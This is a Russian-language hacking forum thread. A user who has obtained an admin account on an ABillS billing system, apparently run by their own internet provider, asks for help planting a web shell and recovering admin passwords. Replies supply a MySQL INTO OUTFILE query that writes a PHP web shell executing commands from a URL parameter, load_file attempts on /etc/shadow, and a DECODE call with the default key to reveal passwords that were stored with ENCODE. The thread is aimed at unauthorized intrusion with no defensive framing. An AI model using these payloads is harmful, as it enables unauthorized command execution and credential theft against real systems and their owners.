Может для когото вопросы покажутся и "детскими", но все-же:
Нарыл акк админа, очень бы хотелось залить шелл.В системе присутствует sql commander. Но или я тупой :mad: или коммандер какой-то не такой :confused:(скорее всего первое :( )
сайт разработчкика (bills.net.ua)
Делаю запрос например на вывод других админов в системе select user,password from admins в ответ выплевывает admin Чвl?ЄDЅ%КrJKЛ Как вывести на нормальном языке?
Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде.
По поводу шела into outfile как и load не получается использовать (выскакивает ошибка error select tables from blabla).
-------------------------------
какие есть варианты?

admin Чвl?ЄDЅ%КrJKЛ


ну с этим возни больше будет, а вот что с шеллом не получается? напиши конкретно какой запрос делаешь и какую ошибку выкидывает, ну вообщем поподробнее опиши свои действия.

система работает на базе ".cgi"
user:abills@localhost
database:abills
version:5.0.51a-log
information_schema выводит
----------------------------------------
SELECT load_file('/etc/hosts') результат Ok
Но вывода файла нет =(
select load_file('/etc/shadow') ok
на права не ругается, значит доступ есть, но опять таки вывода файла нет.
---------------------------------------
Дальше колупать(не зная) стремно, как никак мой пров ))
---------------------------------------
Может кто подскажет как быть с выводом? или может с заливкой шелла?

так что те мешает найти папку для записи и потом выполнить запрос
select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php'

ну и потом просто http:\\путь до файла\shell.php?cmd=команда(напри мер dir)


p.s. исправил вчера забыл дописать from xd

Как вывести на нормальном языке?
Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде.


похожая проблема с выводом паролей

__https://forum.antichat.ru/thread71538.html

может хеш такой?

попробуй вот так
select user,cast(password as binary) from admins

так что те мешает найти папку для записи и потом выполнить запрос
select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php'

мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка

[3] ERROR_SQL /select `
или [3] ERROR_SQL/select (сам запрос)

мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка

[3] ERROR_SQL /select `
или [3] ERROR_SQL/select (сам запрос)

Я с этим sql commanderом не встречался, но ситуация была похожая. Когда ты делаешь select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www... , уверен, что количество столбцов в первом и втором selecte совпадает?

Пробовал вот так
select 1,2,'<?php system($_GET["cmd"]); ?>',4 from mysql.user into outfile 'C:\www... ?

Все кто отвечал так и не смотрели исходники :(. Сам вот добрался немного посмотрел(хоть сильно в этом и не разбираюсь)
так вот пароли выводятся криво из за функции encode
INSERT INTO admins (id, name, regdate, password, gid, aid, disable, phone, web_options) VALUES ('abills','abills','2005-06-16', ENCODE('abills', 'test12345678901234567890'), 0, 1,0,'', '');
как составить запрос для правильного вывода? Как я понял нужно использовать decode. А по поводу встроенного в систему sql commander-a может кто-то все таки не поленится и попробует систему в действии чтобы дать дельный совет по поводу шелла? буду признателен

SELECT load_file('/etc/hosts') результат Ok
Но вывода файла нет =(
select load_file('/etc/shadow') ok
на права не ругается, значит доступ есть, но опять таки вывода файла нет.
Наоборот, просто прав нету)

функция обратная ENCODE это DECODE
decode('abills', 'test12345678901234567890')
ну или как там у тебя запрос составишь..